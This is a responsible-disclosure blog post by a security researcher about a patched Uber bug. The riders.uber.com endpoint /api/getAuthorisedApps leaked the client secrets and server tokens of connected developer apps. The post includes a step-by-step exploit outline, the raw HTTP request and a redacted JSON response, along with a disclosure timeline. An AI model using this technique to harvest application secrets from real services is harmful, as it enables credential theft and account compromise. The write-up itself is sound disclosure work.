Learn more
How we discovered Uber’s developer applications were leaking client secret and server tokens
Security Research

How we discovered Uber’s developer applications were leaking client secret and server tokens

This post is about an information leakage vulnerability on riders.uber.com in which we identified an public API endpoint of https://riders.uber.com/profile that could send back server tokens and client secret for applications authorized by the account owner to access their Uber account.

Anand Prakash
March 25, 2021
Image for post

This is being published with the permission of Uber under the responsible disclosure policy.

This post is about an information leakage vulnerability on riders.uber.com in which we identified an public API endpoint of https://riders.uber.com/profile that could send back server tokens and client secret for applications authorized by the account owner to access their Uber account.

As per Uber’s documentation:

“The secret for your application, this should be treated like your application’s password. Never share this with anyone, check this into source code, or post in any public forum. Additionally, this should not be distributed on client devices where users could decompile your code and access the secret. If you suspect your client_secret has been compromised you may generate a new one in your application’s dashboard which will immediately invalidate the old secret.”

This could have been easily exploited by an attacker by connecting their account to any Uber application on production and then using the profile endpoint to retrieve server tokens and client secrets of the connected application in the API response.

Uber fixed this issue by removing this data from the API response, as reported. Uber publicly notified all developers of this vulnerability and asked developers to rotate secrets on a periodic basis.

Image for post
Notification sent by Uber to developers.
Image for post

About Uber

Uber is a transportation network company (TNC) headquartered in San Francisco, California. Uber offers services including peer-to-peer ridesharing, taxi cab hailing, food delivery, and a bicycle-sharing system. The company has operations in 785 metropolitan areas worldwide. Uber has a valuation of over $100 billion as per Bloomberg’s report.

How my exploit worked step-by-step

Step #1

Attacker connects a random Uber developer application to their account using OAuth. A few examples of Uber developer applications are IFTTT, Payfare, and Bixby. It is not identified as a complicated procedure as of now.

Step #2

Once the above apps are connected by the attacker to their Uber account, they can use against the endpoint to get the developer application’s confidential data and other significant information of the application using the attacker’s session data.

The vulnerable Uber API:

POST /api/getAuthorisedApps HTTP/1.1
Host: riders.uber.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://riders.uber.com/profile
content-type: application/json
x-csrf-token: XXX
origin: https://riders.uber.com
Content-Length: 2
Cookie:

Data getting leaked in API response:

{
 "status": "success",
 "data": {
   "data": {
     "uuid": "xxxx"
   },
   "clientScopes": {
     "authorizedClientScopes": [
       {
         "clientID": "xxx",
         "scopes": [
           "history",
           "offline_access",
           "profile"
         ]
       }
     ]
   },
   "scopeDetails": [
     {
       "applicationDetails": {
         "applicationID": "xxx",
         "owner": {
           "userUUID": "xxxx",
           "userEmail": ""
         },
         "applicationSecret": "xxx",
         "name": "xxx",
         "description": "abc",
         "privacyPolicyURL": "https://appsecure.in",
         "surgeConfirmedRedirectURI": "",
         "webhookURL": "",
         "applicationType": "",
         "requestsPerHour": {
           "low": 0,
           "high": 0,
           "unsigned": false
         },
         "redirectURIs": [
           "xxxxxx"
         ],
         "appSignatures": [],
         "defaultScopes": [
           "history",
           "profile"
         ],
         "whitelistedScopes": [],
         "originURIs": [],
         "serverTokens": [
           "xxx"
         ],
         "ipWhitelist": [],
         "admins": [
           {
             "userUUID": "xxxx",
             "userEmail": ""
           },
           {
             "userUUID": "xxxx",
             "userEmail": ""
           },
           {
             "userUUID": "xxxx",
             "userEmail": ""
           }
         ],
         "developers": [
           {
             "userUUID": "xxxx",
             "userEmail": ""
           }
         ],
         "tags": [],
         "oauthEnabled": false,
         "smsVerificationEnabled": false,
         "cobrandingEnabled": false,
         "supplyOnly": false,
         "isInternal": true,
         "cobrandingDetails": {
           "nativeURL": "",
           "androidFallbackURL": "",
           "iosFallbackURL": "",
           "displayName": "",
           "linkName": "",
           "logoUUID": "",
           "logoFiletype": "",
           "generatedLogoURL": ""
         },
         "availableScopes": [
           "delivery",
           "history",
           "history_lite",
           "places",
           "profile",
           "ride_widgets"
         ],
         "openScopes": [
           "delivery",
           "history",
           "history_lite",
           "places",
           "profile",
           "ride_widgets"
         ],
         "developerScopes": [
           "all_trips",
           "request",
           "request_receipt"
         ],
         "createdAt": {
           "low": "xxx",
           "high": 0,
           "unsigned": false
         },
         "updatedAt": {
           "low": "xxx",
           "high": 0,
           "unsigned": false
         },
         "displayName": null,
         "iconURL": null,
         "publicDescription": null,
         "appGalleryDetails": {
           "mobilePlatforms": [],
           "publicationState": "",
           "redirectURI": "xxxx",
           "permissionState": ""
         }
       },
       "permissions": null,
       "userRoleInvitations": null
     }
   ]
 }
}

Disclosure Timeline

October 5th, 2018: Report sent to Uber’s Security team.

November 6th, 2018: Issue resolved by Uber. AppSecure asked Uber to notify all developers in case their app secrets were no longer confidential. We verified the fix.

December 20th, 2018: Uber replied, stating, “They are in process of notifying the developers and in process of putting up long-term fix in place for this issue.”

February 8th 2019: Uber rewarded us with $5000 bounty and notified all developers via email about the same. The issue was publicly disclosed after the action was conducted.

ABOUT THE AUTHOR
Anand Prakash

Anand Prakash is a prolific security researcher who is famous for finding bugs in some of the world’s most popular apps and websites. He thrives off of “bug bounties” — large cash prizes he earns from companies in exchange for successfully hacking their systems and showing them their security flaws. Anand is supremely good at what he does, having discovered vulnerabilities at companies like Facebook, Twitter, and Uber. For the past 5 years, Facebook’s has ranked Anand as one of their top bounty hunters.And on Twitter’s bounty program, he’s ranked #3 world-wide. Anand’s reputation as a hacker has lead to him being featured in last year’s Forbes “30 under 30” for enterprise technology in Asia. And a major Indian news website declared Anand “one of India’s best known white hat hackers.”‍

Enjoyed this read?

Stay up to date with the latest security research by PingSafe team.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.